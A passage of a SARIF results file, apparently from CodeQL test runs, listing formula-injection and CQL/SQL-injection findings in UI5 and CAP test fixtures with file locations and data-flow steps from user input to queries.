"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 58 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 46, - "endColumn" : 59 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 36, - "endColumn" : 60 - } - }, - "message" : { - "text" : "encodeX ... value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 21, - "endColumn" : 60 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 23, - "startColumn" : 27, - "endColumn" : 39 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : 
"js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - }, - "region" : { - "startLine" : 16, - "startColumn" : 23, - "endColumn" : 51 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e701acdf85af03b4:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - }, - "region" : { - "startLine" : 16, - "startColumn" : 23, - "endColumn" : 51 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 13, - "startColumn" : 36, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e5ae8639cd6967fb:1", - "primaryLocationStartColumnFingerprint" : "29" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : 
"%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 50, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 44, - "endColumn" : 56 - } - }, - "message" : { - "text" : "`ID=${book}`" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" 
: "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 19, - "endColumn" : 57 - } - }, - "message" : { - "text" : "SELECT. ... book}`)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 11, - "endColumn" : 57 - } - }, - "message" : { - "text" : "query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 13, - "startColumn" : 36, - "endColumn" : 41 - } - }, - "message" : { - "text" : "query" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 27, - "endColumn" : 65 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b41554298e90b620:1", - "primaryLocationStartColumnFingerprint" : "20" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", 
- "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 58, - "endColumn" : 62 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 52, - "endColumn" : 64 - } - }, - "message" : { - "text" : "`ID=${book}`" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 27, - "endColumn" : 65 - } - }, - "message" : { - "text" : "SELECT. ... 
book}`)" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 18, - "startColumn" : 37, - "endColumn" : 43 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "967d7be3edc97a9e:1", - "primaryLocationStartColumnFingerprint" : "30" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 
8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 57 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 45, - "endColumn" : 57 - } - }, - "message" : { - "text" : "'ID=' + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" 
: 17, - "startColumn" : 20, - "endColumn" : 58 - } - }, - "message" : { - "text" : "SELECT. ... + book)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 11, - "endColumn" : 58 - } - }, - "message" : { - "text" : "query2" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 18, - "startColumn" : 37, - "endColumn" : 43 - } - }, - "message" : { - "text" : "query2" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 65 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1c132adaa6986472:1", - "primaryLocationStartColumnFingerprint" : "20" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", 
- "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 60, - "endColumn" : 64 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 52, - "endColumn" : 64 - } - }, - "message" : { - "text" : "'ID=' + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 65 - } - }, - "message" : { - "text" : "SELECT. ... 
+ book)" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 28, - "startColumn" : 39, - "endColumn" : 42 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "144d55d233768c80:1", - "primaryLocationStartColumnFingerprint" : "32" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 
8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 59, - "endColumn" : 63 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 17, - "endColumn" : 63 - } - }, - "message" : { - "text" : "CQL`SEL ... 
+ book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 11, - "endColumn" : 63 - } - }, - "message" : { - "text" : "cqn" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 28, - "startColumn" : 39, - "endColumn" : 42 - } - }, - "message" : { - "text" : "cqn" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 31, - "startColumn" : 39, - "endColumn" : 43 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1cd6f1adc2ef8f7c:1", - "primaryLocationStartColumnFingerprint" : "32" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", 
